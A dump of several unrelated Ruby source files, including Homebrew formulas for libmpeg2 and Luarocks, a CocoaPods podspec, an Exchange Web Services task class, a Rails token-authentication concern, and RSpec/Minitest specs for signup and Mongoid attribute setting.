@request ||= ActionDispatch::Request.new(env)
end
def reset_session!
request.reset_session
end
def cookies
request.cookie_jar
end
end
end
end
| 20.129032 | 68 | 0.654647 |
5d6f4d48545e7348e8efde9cb62224bdf27eb2a3 | 1,488 | class Libmpeg2 < Formula
desc "Library to decode mpeg-2 and mpeg-1 video streams"
homepage "https://libmpeg2.sourceforge.io/"
url "https://libmpeg2.sourceforge.io/files/libmpeg2-0.5.1.tar.gz"
sha256 "dee22e893cb5fc2b2b6ebd60b88478ab8556cb3b93f9a0d7ce8f3b61851871d4"
license "GPL-2.0-or-later"
livecheck do
url "https://libmpeg2.sourceforge.io/downloads.html"
regex(/href=.*?libmpeg2[._-]v?(\d+(?:\.\d+)+)\.t/i)
end
bottle do
rebuild 2
sha256 cellar: :any, arm64_big_sur: "e2f1a24fdb40a15928f35ae84326fab5b8d1293ca2b378aee8e45aab9bb5766c"
sha256 cellar: :any, big_sur: "9f2cfd80d47e975333747fdea41d336071282ae359e9a345835a70611467bd43"
sha256 cellar: :any, catalina: "9a8c812495f38eb0d46bff246c632c5dfd97413b2bc949defd9c5d318b9da439"
sha256 cellar: :any, mojave: "81161223100cfa38704d3194519be5651f4fcb47765b7e99f1d53ce05e433142"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "sdl"
def install
# Otherwise compilation fails in clang with `duplicate symbol ___sputc`
ENV.append_to_cflags "-std=gnu89"
system "autoreconf", "-fiv"
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
pkgshare.install "doc/sample1.c"
end
test do
system ENV.cc, "-I#{include}/mpeg2dec", pkgshare/"sample1.c", "-L#{lib}", "-lmpeg2"
end
end
| 36.292683 | 106 | 0.709677 |
33e17c24f979a85a1418783e948e8d0bee7832b5 | 1,599 | #
# Be sure to run `pod lib lint MobDevLib.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'MobDevLib'
s.version = '0.1.1'
s.summary = 'iOS工具收集,代码复用,加快开发进度!'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
# s.description = <<-DESC
#网络、多线程、UI、第三方框架
# DESC
s.homepage = 'https://github.com/MobDeveloper163/MobDevLib'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'Mob_Developer' => '[email protected]' }
s.source = { :git => 'https://github.com/MobDeveloper163/MobDevLib.git', :tag => s.version.to_s }
s.requires_arc = true
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'MobDevLib/Classes/**/*'
# s.resource_bundles = {
# 'MobDevLib' => ['MobDevLib/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 33.3125 | 109 | 0.632896 |
21472bd4ecf3435489582cbdea07482c0ce69b61 | 864 | module ServiceAPIUserAuthentication
include ActionController::HttpAuthentication::Token::ControllerMethods
extend ActiveSupport::Concern
included do
before_action :verify_token!
end
def verify_token!
unless authorized?
render_error(
name: 'Unauthorized',
message: 'Please provide a valid API token',
status: :unauthorized,
)
end
end
def authorized?
authenticate_with_http_token do |token|
@authenticating_token = AuthenticationToken.find_by_hashed_token(user_type: 'ServiceAPIUser', raw_token: token)
@authenticating_token.user_id == ServiceAPIUser.find_by(authorized_api: self.class.name.deconstantize).id
end
end
def render_error(name:, message:, status:)
response = { errors: [{ error: name, message: message }] }
render json: response, status: status
end
end
| 27 | 117 | 0.721065 |
ac31c90e8f254be218fb3d527143e6d9806dd78c | 1,765 | class SS::Migration20160225000000
def change
change_sys
change_cms
change_gws
end
def change_sys
Sys::Role.where(permissions: 'edit_sys_users').each do |item|
permissions = item.permissions
%w(
edit_sys_groups
edit_sys_roles
).each do |name|
permissions << name unless item.permissions.include?(name)
end
item.permissions = permissions
item.save! if item.changed?
end
end
def change_cms
Cms::Role.where(permissions: 'edit_cms_users').each do |item|
permissions = item.permissions
%w(
edit_cms_groups
edit_cms_roles
edit_cms_members
edit_cms_editor_templates
use_cms_tools
edit_chorg_revisions
read_other_workflow_routes
read_private_workflow_routes
edit_other_workflow_routes
edit_private_workflow_routes
delete_other_workflow_routes
delete_private_workflow_routes
).each do |name|
permissions << name unless item.permissions.include?(name)
end
item.permissions = permissions
item.save! if item.changed?
end
end
def change_gws
Gws::Role.where(permissions: 'edit_gws_users').each do |item|
permissions = item.permissions
%w(
edit_gws_groups
edit_gws_roles
read_other_gws_workflow_routes
read_private_gws_workflow_routes
edit_other_gws_workflow_routes
edit_private_gws_workflow_routes
delete_other_gws_workflow_routes
delete_private_gws_workflow_routes
).each do |name|
permissions << name unless item.permissions.include?(name)
end
item.permissions = permissions
item.save! if item.changed?
end
end
end
| 26.742424 | 66 | 0.675354 |
bbfaa52906ff0c96f0b2e4a0201daf59a5a25468 | 10,065 | require_relative "../errors"
require_relative "../helpers"
module VagrantPlugins
module Ansible
module Provisioner
# This class is a base class where the common functionality shared between
# both Ansible provisioners are stored.
# This is **not an actual provisioner**.
# Instead, {Host} (ansible) or {Guest} (ansible_local) should be used.
class Base < Vagrant.plugin("2", :provisioner)
RANGE_PATTERN = %r{(?:\[[a-z]:[a-z]\]|\[[0-9]+?:[0-9]+?\])}.freeze
protected
def initialize(machine, config)
super
@command_arguments = []
@environment_variables = {}
@inventory_machines = {}
@inventory_path = nil
end
def check_files_existence
check_path_is_a_file config.playbook, :playbook
check_path_exists config.inventory_path, :inventory_path if config.inventory_path
check_path_is_a_file config.extra_vars[1..-1], :extra_vars if has_an_extra_vars_file_argument
check_path_is_a_file config.galaxy_role_file, :galaxy_role_file if config.galaxy_role_file
check_path_is_a_file config.vault_password_file, :vault_password if config.vault_password_file
end
def ansible_playbook_command_for_shell_execution
shell_command = []
@environment_variables.each_pair do |k, v|
if k =~ /ANSIBLE_SSH_ARGS|ANSIBLE_ROLES_PATH/
shell_command << "#{k}='#{v}'"
else
shell_command << "#{k}=#{v}"
end
end
shell_command << "ansible-playbook"
shell_args = []
@command_arguments.each do |arg|
if arg =~ /(--start-at-task|--limit)=(.+)/
shell_args << %Q(#{$1}="#{$2}")
elsif arg =~ /(--extra-vars)=(.+)/
shell_args << %Q(%s="%s") % [$1, $2.gsub('\\', '\\\\\\').gsub('"', %Q(\\"))]
else
shell_args << arg
end
end
shell_command << shell_args
# Add the raw arguments at the end, to give them the highest precedence
shell_command << config.raw_arguments if config.raw_arguments
shell_command << config.playbook
shell_command.flatten.join(' ')
end
def prepare_common_command_arguments
# By default we limit by the current machine,
# but this can be overridden by the `limit` option.
if config.limit
@command_arguments << "--limit=#{Helpers::as_list_argument(config.limit)}"
else
@command_arguments << "--limit=#{@machine.name}"
end
@command_arguments << "--inventory-file=#{inventory_path}"
@command_arguments << "--extra-vars=#{extra_vars_argument}" if config.extra_vars
@command_arguments << "--sudo" if config.sudo
@command_arguments << "--sudo-user=#{config.sudo_user}" if config.sudo_user
@command_arguments << "#{verbosity_argument}" if verbosity_is_enabled?
@command_arguments << "--vault-password-file=#{config.vault_password_file}" if config.vault_password_file
@command_arguments << "--tags=#{Helpers::as_list_argument(config.tags)}" if config.tags
@command_arguments << "--skip-tags=#{Helpers::as_list_argument(config.skip_tags)}" if config.skip_tags
@command_arguments << "--start-at-task=#{config.start_at_task}" if config.start_at_task
end
def prepare_common_environment_variables
# Ensure Ansible output isn't buffered so that we receive output
# on a task-by-task basis.
@environment_variables["PYTHONUNBUFFERED"] = 1
# When Ansible output is piped in Vagrant integration, its default colorization is
# automatically disabled and the only way to re-enable colors is to use ANSIBLE_FORCE_COLOR.
@environment_variables["ANSIBLE_FORCE_COLOR"] = "true" if @machine.env.ui.color?
# Setting ANSIBLE_NOCOLOR is "unnecessary" at the moment, but this could change in the future
# (e.g. local provisioner [GH-2103], possible change in vagrant/ansible integration, etc.)
@environment_variables["ANSIBLE_NOCOLOR"] = "true" if [email protected]?
# Use ANSIBLE_ROLES_PATH to tell ansible-playbook where to look for roles
# (there is no equivalent command line argument in ansible-playbook)
@environment_variables["ANSIBLE_ROLES_PATH"] = get_galaxy_roles_path if config.galaxy_roles_path
end
# Auto-generate "safe" inventory file based on Vagrantfile,
# unless inventory_path is explicitly provided
def inventory_path
if config.inventory_path
config.inventory_path
else
@inventory_path ||= generate_inventory
end
end
def get_inventory_host_vars_string(machine_name)
# In Ruby, Symbol and String values are different, but
# Vagrant has to unify them for better user experience.
vars = config.host_vars[machine_name.to_sym]
if !vars
vars = config.host_vars[machine_name.to_s]
end
s = nil
if vars.is_a?(Hash)
s = vars.each.collect{ |k, v| "#{k}=#{v}" }.join(" ")
elsif vars.is_a?(Array)
s = vars.join(" ")
elsif vars.is_a?(String)
s = vars
end
if s and !s.empty? then s else nil end
end
def generate_inventory
inventory = "# Generated by Vagrant\n\n"
# This "abstract" step must fill the @inventory_machines list
# and return the list of supported host(s)
inventory += generate_inventory_machines
inventory += generate_inventory_groups
# This "abstract" step must create the inventory file and
# return its location path
# TODO: explain possible race conditions, etc.
@inventory_path = ship_generated_inventory(inventory)
end
# Write out groups information.
# All defined groups will be included, but only supported
# machines and defined child groups will be included.
def generate_inventory_groups
groups_of_groups = {}
defined_groups = []
group_vars = {}
inventory_groups = ""
# Verify if host range patterns exist and warn
if config.groups.any? { |gm| gm.to_s[RANGE_PATTERN] }
@machine.ui.warn(I18n.t("vagrant.provisioners.ansible.ansible_host_pattern_detected"))
end
config.groups.each_pair do |gname, gmembers|
if gname.is_a?(Symbol)
gname = gname.to_s
end
if gmembers.is_a?(String)
gmembers = gmembers.split(/\s+/)
elsif gmembers.is_a?(Hash)
gmembers = gmembers.each.collect{ |k, v| "#{k}=#{v}" }
elsif !gmembers.is_a?(Array)
gmembers = []
end
if gname.end_with?(":children")
groups_of_groups[gname] = gmembers
defined_groups << gname.sub(/:children$/, '')
elsif gname.end_with?(":vars")
group_vars[gname] = gmembers
else
defined_groups << gname
inventory_groups += "\n[#{gname}]\n"
gmembers.each do |gm|
# TODO : Expand and validate host range patterns
# against @inventory_machines list before adding them
# otherwise abort with an error message
if gm[RANGE_PATTERN]
inventory_groups += "#{gm}\n"
end
inventory_groups += "#{gm}\n" if @inventory_machines.include?(gm.to_sym)
end
end
end
defined_groups.uniq!
groups_of_groups.each_pair do |gname, gmembers|
inventory_groups += "\n[#{gname}]\n"
gmembers.each do |gm|
inventory_groups += "#{gm}\n" if defined_groups.include?(gm)
end
end
group_vars.each_pair do |gname, gmembers|
if defined_groups.include?(gname.sub(/:vars$/, ""))
inventory_groups += "\n[#{gname}]\n" + gmembers.join("\n") + "\n"
end
end
return inventory_groups
end
def has_an_extra_vars_file_argument
config.extra_vars && config.extra_vars.kind_of?(String) && config.extra_vars =~ /^@.+$/
end
def extra_vars_argument
if has_an_extra_vars_file_argument
# A JSON or YAML file is referenced.
config.extra_vars
else
# Expected to be a Hash after config validation.
config.extra_vars.to_json
end
end
def get_galaxy_role_file
Helpers::expand_path_in_unix_style(config.galaxy_role_file, get_provisioning_working_directory)
end
def get_galaxy_roles_path
base_dir = get_provisioning_working_directory
if config.galaxy_roles_path
Helpers::expand_path_in_unix_style(config.galaxy_roles_path, base_dir)
else
playbook_path = Helpers::expand_path_in_unix_style(config.playbook, base_dir)
File.join(Pathname.new(playbook_path).parent, 'roles')
end
end
def ui_running_ansible_command(name, command)
@machine.ui.detail I18n.t("vagrant.provisioners.ansible.running_#{name}")
if verbosity_is_enabled?
# Show the ansible command in use
@machine.env.ui.detail command
end
end
def verbosity_is_enabled?
config.verbose && !config.verbose.to_s.empty?
end
def verbosity_argument
if config.verbose.to_s =~ /^-?(v+)$/
"-#{$+}"
else
# safe default, in case input strays
'-v'
end
end
end
end
end
end
| 37.696629 | 115 | 0.594933 |
110cc32020e69ef10fb2927dfcb21b89a6d5f5b3 | 292 | name "docker"
maintainer "OpenStreetMap Administrators"
maintainer_email "[email protected]"
license "Apache-2.0"
description "Installs and configures the docker daemon"
version "1.0.0"
supports "ubuntu"
depends "apt"
| 29.2 | 61 | 0.619863 |
1d8a47f79db20b07304bb6ca3059d3447ab4ea54 | 756 | Pod::Spec.new do |spec|
spec.name = "DeviceIDSdk"
spec.version = "1.1"
spec.summary = "DeviceIDSdk is the client for create device id."
spec.homepage = "https://github.com/webeyemob/DeviceIDSdk"
spec.license = { :type => 'MIT', :file => "LICENSE" }
spec.author = "taurusx"
spec.platform = :ios, "9.0"
spec.source = { :git => "https://github.com/webeyemob/DeviceIDSdk.git", :tag => "#{spec.version}" }
spec.vendored_frameworks = "DeviceIDSdk.framework"
spec.frameworks = 'SystemConfiguration'
spec.weak_frameworks = 'CoreTelephony', 'AdSupport','iAd'
spec.library = 'resolve.9'
spec.pod_target_xcconfig = { 'BITCODE_GENERATION_MODE' => 'bitcode', 'OTHER_LDFLAGS' => '-lObjC' }
end | 50.4 | 107 | 0.640212 |
e2c04254ed83014fcfede92c49e7b076be8634f9 | 1,742 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Mutations::Clusters::Agents::Create do
include GraphqlHelpers
subject(:mutation) { described_class.new(object: nil, context: context, field: nil) }
let(:project) { create(:project, :public, :repository) }
let(:user) { create(:user) }
let(:context) do
GraphQL::Query::Context.new(
query: query_double(schema: nil), # rubocop:disable RSpec/VerifiedDoubles
values: { current_user: user },
object: nil
)
end
specify { expect(described_class).to require_graphql_authorizations(:create_cluster) }
describe '#resolve' do
subject { mutation.resolve(project_path: project.full_path, name: 'test-agent') }
context 'without project permissions' do
it 'raises an error if the resource is not accessible to the user' do
expect { subject }.to raise_error(Gitlab::Graphql::Errors::ResourceNotAvailable)
end
end
context 'with user permissions' do
before do
project.add_maintainer(user)
end
it 'creates a new clusters_agent', :aggregate_failures do
expect { subject }.to change { ::Clusters::Agent.count }.by(1)
expect(subject[:cluster_agent].name).to eq('test-agent')
expect(subject[:errors]).to eq([])
end
context 'invalid params' do
subject { mutation.resolve(project_path: project.full_path, name: '@bad_name!') }
it 'generates an error message when name is invalid', :aggregate_failures do
expect(subject[:clusters_agent]).to be_nil
expect(subject[:errors]).to eq(["Name can contain only lowercase letters, digits, and '-', but cannot start or end with '-'"])
end
end
end
end
end
| 32.867925 | 136 | 0.675086 |
f7e130c0289ea49c8f325074f6272c82bf34e6e8 | 3,257 | require 'formula'
class Luarocks < Formula
homepage 'http://luarocks.org'
head 'https://github.com/keplerproject/luarocks.git'
url 'http://luarocks.org/releases/luarocks-2.1.2.tar.gz'
sha1 '406253d15c9d50bb0d09efa9807fb2ddd31cba9d'
option 'with-luajit', 'Use LuaJIT instead of the stock Lua'
option 'with-lua52', 'Use Lua 5.2 instead of the stock Lua'
if build.include? 'with-luajit'
depends_on 'luajit'
# luajit depends internally on lua being installed
# and is only 5.1 compatible, see #25954
depends_on 'lua'
elsif build.include? 'with-lua52'
depends_on 'lua52'
else
depends_on 'lua'
end
fails_with :llvm do
cause "Lua itself compiles with llvm, but may fail when other software tries to link."
end
# Remove writability checks in the install script.
# Homebrew checks that its install targets are writable, or fails with
# appropriate messaging if not. The check that luarocks does has been
# seen to have false positives, so remove it.
# TODO: better document the false positive cases, or remove this patch.
def patches
DATA
end
def install
# Install to the Cellar, but direct modules to HOMEBREW_PREFIX
args = ["--prefix=#{prefix}",
"--rocks-tree=#{HOMEBREW_PREFIX}",
"--sysconfdir=#{etc}/luarocks"]
if build.include? 'with-luajit'
args << "--with-lua-include=#{HOMEBREW_PREFIX}/include/luajit-2.0"
args << "--lua-suffix=jit"
args << "--with-lua=luajit"
end
system "./configure", *args
system "make"
system "make install"
end
def caveats; <<-EOS.undent
Rocks install to: #{HOMEBREW_PREFIX}/lib/luarocks/rocks
You may need to run `luarocks install` inside the Homebrew build
environment for rocks to successfully build. To do this, first run `brew sh`.
EOS
end
test do
opoo "Luarocks test script installs 'lpeg'"
system "#{bin}/luarocks", "install", "lpeg"
system "lua", "-llpeg", "-e", 'print ("Hello World!")'
end
end
__END__
diff --git a/src/luarocks/fs/lua.lua b/src/luarocks/fs/lua.lua
index 67c3ce0..2d149c7 100644
--- a/src/luarocks/fs/lua.lua
+++ b/src/luarocks/fs/lua.lua
@@ -669,29 +669,5 @@ end
-- @return boolean or (boolean, string): true on success, false on failure,
-- plus an error message.
function check_command_permissions(flags)
- local root_dir = path.root_dir(cfg.rocks_dir)
- local ok = true
- local err = ""
- for _, dir in ipairs { cfg.rocks_dir, root_dir } do
- if fs.exists(dir) and not fs.is_writable(dir) then
- ok = false
- err = "Your user does not have write permissions in " .. dir
- break
- end
- end
- local root_parent = dir.dir_name(root_dir)
- if ok and not fs.exists(root_dir) and not fs.is_writable(root_parent) then
- ok = false
- err = root_dir.." does not exist and your user does not have write permissions in " .. root_parent
- end
- if ok then
- return true
- else
- if flags["local"] then
- err = err .. " \n-- please check your permissions."
- else
- err = err .. " \n-- you may want to run as a privileged user or use your local tree with --local."
- end
- return nil, err
- end
+ return true
end
| 31.317308 | 108 | 0.662266 |
9132818926c03ee249fc749b147d67952158428b | 1,994 | require "test_helper"
class UsersSignupTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
test "invalid signup information" do
get signup_path
# post(が失敗するので)後にUser.countが不変であることをテストする
assert_no_difference 'User.count' do
post users_path, params: { user: { name: "",
email: "user@invalid",
password: "foo",
password_confirmation: "bar" } }
end
# user/newがviewされることをテストする
assert_template 'users/new'
# URLをテストする
#assert_select 'form[action="/signup"]' 下の書き方のほうが良いのかな?
assert_select 'form[action=?]', "/signup"
# 表示されたページにエラーメッセージタグの存在をテストする
assert_select 'div#error_explanation'
assert_select 'div.alert'
assert_select 'div.alert-danger'
assert_select 'ul/li'
# alertクラスのdivタグが、文字列"The form contains"を含んでいることをテストする
assert_select "div.alert", /The form contains/
# alertクラスのdivタグが、文字列"error"を含んでいることをテストする
assert_select "div.alert", /error/
# flashが空であることをテストする
assert flash.empty?
end
# 正常なサインアップテスト
test "valid signup information" do
get signup_path
# 実行後にカウントが1増えている(差分がある)ことをテストする
# テストが完了(rails testが終了)するとテスト用DBはリセットされる?
# ので、下記テストは常に成功する
assert_difference 'User.count', 1 do
post users_path, params: { user: { name: "Example User",
email: "[email protected]",
password: "password",
password_confirmation: "password" } }
end
# postの結果で指定されたリダイレクト先(成功の場合は、users/showのはず)へ移動する
follow_redirect!
# 移動先が、users/showテンプレートに一致しているか否かをテストする
assert_template 'users/show'
# flash内容をテストする
assert_select 'div.alert-success', "Welcome to the Sample App!"
assert_not flash.empty?
# ログイン状態であることをチェック
assert is_logged_in?
end
end
| 33.79661 | 78 | 0.615848 |
08649d7ff724d197f15c646fe96cc3e7beafd8f3 | 3,942 | module Viewpoint::EWS::Types
class Task
include Viewpoint::EWS
include Viewpoint::EWS::Types
include Viewpoint::EWS::Types::Item
TASK_KEY_PATHS = {
complete?: [:is_complete, :text],
recurring?: [:is_recurring, :text],
start_date: [:start_date, :text],
due_date: [:due_date, :text],
reminder_due_by: [:reminder_due_by, :text],
reminder?: [:reminder_is_set, :text],
percent_complete: [:percent_complete, :text],
status: [:status, :text],
}
TASK_KEY_TYPES = {
recurring?: ->(str){str.downcase == 'true'},
complete?: ->(str){str.downcase == 'true'},
reminder?: ->(str){str.downcase == 'true'},
percent_complete: ->(str){str.to_i},
}
TASK_KEY_ALIAS = {}
# Updates the specified item attributes
#
# Uses `SetItemField` if value is present and `DeleteItemField` if value is nil
# @param updates [Hash] with (:attribute => value)
# @param options [Hash]
# @option options :conflict_resolution [String] one of 'NeverOverwrite', 'AutoResolve' (default) or 'AlwaysOverwrite'
# @option options :send_meeting_invitations_or_cancellations [String] one of 'SendToNone' (default), 'SendOnlyToAll',
# 'SendOnlyToChanged', 'SendToAllAndSaveCopy' or 'SendToChangedAndSaveCopy'
# @return [CalendarItem, false]
# @example Update Subject and Body
# item = #...
# item.update_item!(subject: 'New subject', body: 'New Body')
# @see http://msdn.microsoft.com/en-us/library/exchange/aa580254.aspx
# @todo AppendToItemField updates not implemented
def update_item!(updates, options = {})
item_updates = []
updates.each do |attribute, value|
item_field = FIELD_URIS[attribute][:text] if FIELD_URIS.include? attribute
field = {field_uRI: {field_uRI: item_field}}
if value.nil? && item_field
# Build DeleteItemField Change
item_updates << {delete_item_field: field}
elsif item_field
# Build SetItemField Change
hash = { attribute => value }
# body_type needs to be together with body, so we mix them here if necessary
# if no body_type is set, the default is 'Text'
if attribute == :body && updates[:body_type]
hash[:body_type] = updates[:body_type]
end
item = Viewpoint::EWS::Template::Task.new(hash)
# Remap attributes because ews_builder #dispatch_field_item! uses #build_xml!
item_attributes = item.to_ews_item.map do |name, value|
if value.is_a? String
{name => {text: value}}
elsif value.is_a? Hash
node = {name => {}}
value.each do |attrib_key, attrib_value|
attrib_key = camel_case(attrib_key) unless attrib_key == :text
node[name][attrib_key] = attrib_value
end
node
else
{name => value}
end
end
item_updates << {set_item_field: field.merge(task: {sub_elements: item_attributes})}
else
# Ignore unknown attribute
end
end
if item_updates.any?
data = {}
data[:conflict_resolution] = options[:conflict_resolution] || 'AutoResolve'
data[:item_changes] = [{item_id: self.item_id, updates: item_updates}]
rm = ews.update_item(data).response_messages.first
if rm && rm.success?
self.get_all_properties!
self
else
raise EwsCreateItemError, "Could not update task item. #{rm.code}: #{rm.message_text}" unless rm
end
end
end
private
def key_paths
super.merge(TASK_KEY_PATHS)
end
def key_types
super.merge(TASK_KEY_TYPES)
end
def key_alias
super.merge(TASK_KEY_ALIAS)
end
end
end
| 34.884956 | 121 | 0.600203 |
08026a517c437f9db83bb650ac97ebcfa2f2f4ec | 1,180 | #
# Copyright 2015-2017, Noah Kantrowitz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'net/http'
require 'serverspec'
set :backend, :exec
describe 'rails', if: File.exists?('/opt/test_rails') do
describe port(9001) do
it { is_expected.to be_listening }
end
let(:http) { Net::HTTP.new('localhost', 9001) }
describe '/' do
subject { http.get('/') }
its(:code) { is_expected.to eq '200' }
its(:body) { is_expected.to include '<h1>Hello, Rails!</h1>' }
end
describe '/articles' do
subject { http.get('/articles') }
its(:code) { is_expected.to eq '200' }
its(:body) { is_expected.to include '<h1>Listing articles</h1>' }
end
end
| 28.095238 | 74 | 0.694915 |
1db7026f52905be74d253e34ff92f8b16adf3ab4 | 391 | cask "cursorsense" do
version "2.1.2"
sha256 "393168677f5958ffef36fdf010db84fc3144a34f450497f6a04f176129ef8651"
url "https://plentycom.jp/ctrl/files_cs/CursorSense#{version}.dmg"
appcast "https://plentycom.jp/en/cursorsense/download.php"
name "CursorSense"
homepage "https://plentycom.jp/en/cursorsense/"
depends_on macos: ">= :sierra"
prefpane "CursorSense.prefPane"
end
| 27.928571 | 75 | 0.764706 |
215c3202439f386123591a4ad83c7056a64c9f16 | 10,628 | require "spec_helper"
describe Mongoid::Persistable::Settable do
describe "#set" do
context "when the document is a root document" do
shared_examples_for "a settable root document" do
it "sets the normal field to the new value" do
expect(person.title).to eq("kaiser")
end
it "properly sets aliased fields" do
expect(person.test).to eq("alias-test")
end
it "casts fields that need typecasting" do
expect(person.dob).to eq(date)
end
it "returns self object" do
expect(set).to eq(person)
end
it "persists the normal field set" do
expect(person.reload.title).to eq("kaiser")
end
it "persists sets on aliased fields" do
expect(person.reload.test).to eq("alias-test")
end
it "persists fields that need typecasting" do
expect(person.reload.dob).to eq(date)
end
it "resets the dirty attributes for the sets" do
expect(person).to_not be_changed
end
end
let(:person) do
Person.create
end
let(:date) do
Date.new(1976, 11, 19)
end
context "when provided string fields" do
let!(:set) do
person.set("title" => "kaiser", "test" => "alias-test", "dob" => date)
end
it_behaves_like "a settable root document"
end
context "when provided symbol fields" do
let!(:set) do
person.set(title: "kaiser", test: "alias-test", dob: date)
end
it_behaves_like "a settable root document"
end
end
context "when the document is embedded" do
shared_examples_for "a settable embedded document" do
it "sets the normal field to the new value" do
expect(address.number).to eq(44)
end
it "properly sets aliased fields" do
expect(address.suite).to eq("400")
end
it "casts fields that need typecasting" do
expect(address.end_date).to eq(date)
end
it "returns self object" do
expect(set).to eq(address)
end
it "persists the normal field set" do
expect(address.reload.number).to eq(44)
end
it "persists the aliased field set" do
expect(address.reload.suite).to eq("400")
end
it "persists the fields that need typecasting" do
expect(address.reload.end_date).to eq(date)
end
it "resets the dirty attributes for the sets" do
expect(address).to_not be_changed
end
end
let(:person) do
Person.create
end
let(:address) do
person.addresses.create(street: "t")
end
let(:date) do
Date.new(1976, 11, 19)
end
context "when provided string fields" do
let!(:set) do
address.set("number" => 44, "suite" => "400", "end_date" => date)
end
it_behaves_like "a settable embedded document"
end
context "when provided symbol fields" do
let!(:set) do
address.set(number: 44, suite: "400", end_date: date)
end
it_behaves_like "a settable embedded document"
end
context 'when the field is a relation' do
let(:person) do
Person.create
end
let(:pet) do
Animal.new(name: "somepet")
end
let(:home_phone) do
Phone.new(number: "555-555-5555")
end
let(:office_phone) do
Phone.new(number: "666-666-6666")
end
it "should persist changes of embeds_one field" do
person.set(pet: pet)
expect(person.reload.pet).to eq(pet)
end
it "should persist changes of embeds_many fields" do
person.set({ phone_numbers: [home_phone, office_phone].map { |p| p.as_document} })
expect(person.reload.phone_numbers).to eq([home_phone, office_phone])
end
end
end
end
context "when dynamic attributes are not enabled" do
let(:account) do
Account.create
end
it "raises exception for an unknown attribute " do
expect {
account.set(somethingnew: "somethingnew")
}.to raise_error(Mongoid::Errors::UnknownAttribute)
end
end
context "when dynamic attributes enabled" do
let(:person) do
Person.create
end
it "updates non existing attribute" do
person.set(somethingnew: "somethingnew")
expect(person.reload.somethingnew).to eq "somethingnew"
end
end
context "with an attribute with private setter" do
let(:agent) do
Agent.create
end
let(:title) do
"Double-Oh Seven"
end
it "updates the attribute" do
agent.singleton_class.send :private, :title=
agent.set(title: title)
expect(agent.reload.title).to eq title
end
end
context 'when the field is already set locally' do
let(:church) do
Church.new.tap do |a|
a.location = { 'city' => 'Berlin' }
a.name = 'Church1'
a.save
end
end
context 'when the field is a Hash type' do
before do
church.set('location.neighborhood' => 'Kreuzberg')
end
it 'updates the hash while keeping existing key and values locally' do
expect(church.location).to eq({ 'city' => 'Berlin', 'neighborhood' => 'Kreuzberg'})
end
it 'updates the hash in the database' do
expect(church.reload.location).to eq({ 'city' => 'Berlin', 'neighborhood' => 'Kreuzberg'})
end
end
context 'when the field is assigned with nil' do
before do
church.location = nil
church.set('location.neighborhood' => 'Kreuzberg')
end
it 'updates the hash while keeping existing key and values locally' do
expect(church.location).to eq({'neighborhood' => 'Kreuzberg'})
end
it 'updates the hash in the database' do
expect(church.reload.location).to eq({'neighborhood' => 'Kreuzberg'})
end
end
context 'when the field type is String' do
before do
church.set('name' => 'Church2')
end
it 'updates the field locally' do
expect(church.name).to eq('Church2')
end
it 'updates the field in the database' do
expect(church.reload.name).to eq('Church2')
end
end
context 'when there are two fields of type Hash and String' do
before do
church.set('name' => 'Church2', 'location.street' => 'Yorckstr.')
end
it 'updates the fields locally' do
expect(church.name).to eq('Church2')
expect(church.location).to eq({ 'city' => 'Berlin', 'street' => 'Yorckstr.'})
end
it 'updates the fields in the database' do
expect(church.reload.name).to eq('Church2')
expect(church.reload.location).to eq({ 'city' => 'Berlin', 'street' => 'Yorckstr.'})
end
end
context 'when the field is a nested hash' do
context 'when the field is reset to an empty hash' do
before do
church.set('location' => {})
end
it 'updates the field locally' do
expect(church.location).to eq({})
end
it 'updates the field in the database' do
expect(church.reload.location).to eq({})
end
end
context 'when a leaf value in the nested hash is updated' do
let(:church) do
Church.new.tap do |a|
a.location = {'address' => {'city' => 'Berlin', 'street' => 'Yorckstr'}}
a.name = 'Church1'
a.save
end
end
before do
church.set('location.address.city' => 'Munich')
end
it 'does not reset the nested hash' do
expect(church.name).to eq('Church1')
expect(church.location).to eql({'address' => {'city' => 'Munich', 'street' => 'Yorckstr'}})
end
end
context 'when a leaf value in the nested hash is updated to a number' do
let(:church) do
Church.new.tap do |a|
a.location = {'address' => {'city' => 'Berlin', 'street' => 'Yorckstr'}}
a.name = 'Church1'
a.save
end
end
before do
church.set('location.address.city' => 12345)
end
it 'updates the nested value to the correct value' do
expect(church.name).to eq('Church1')
expect(church.location).to eql({'address' => {'city' => 12345, 'street' => 'Yorckstr'}})
end
end
context 'when the nested hash is many levels deep' do
let(:church) do
Church.new.tap do |a|
a.location = {'address' => {'state' => {'address' => {'city' => 'Berlin', 'street' => 'Yorckstr'}}}}
a.name = 'Church1'
a.save
end
end
before do
church.set('location.address.state.address.city' => 'Munich')
end
it 'does not reset the nested hash' do
expect(church.name).to eq('Church1')
expect(church.location).to eql({'address' => {'state' => {'address' => {'city' => 'Munich', 'street' => 'Yorckstr'}}}})
end
end
end
end
context 'when the field is not already set locally' do
let(:church) do
Church.create
end
context 'when the field is a Hash type' do
before do
church.set('location.neighborhood' => 'Kreuzberg')
end
it 'sets the hash locally' do
expect(church.location).to eq({ 'neighborhood' => 'Kreuzberg'})
end
it 'sets the hash in the database' do
expect(church.reload.location).to eq({ 'neighborhood' => 'Kreuzberg'})
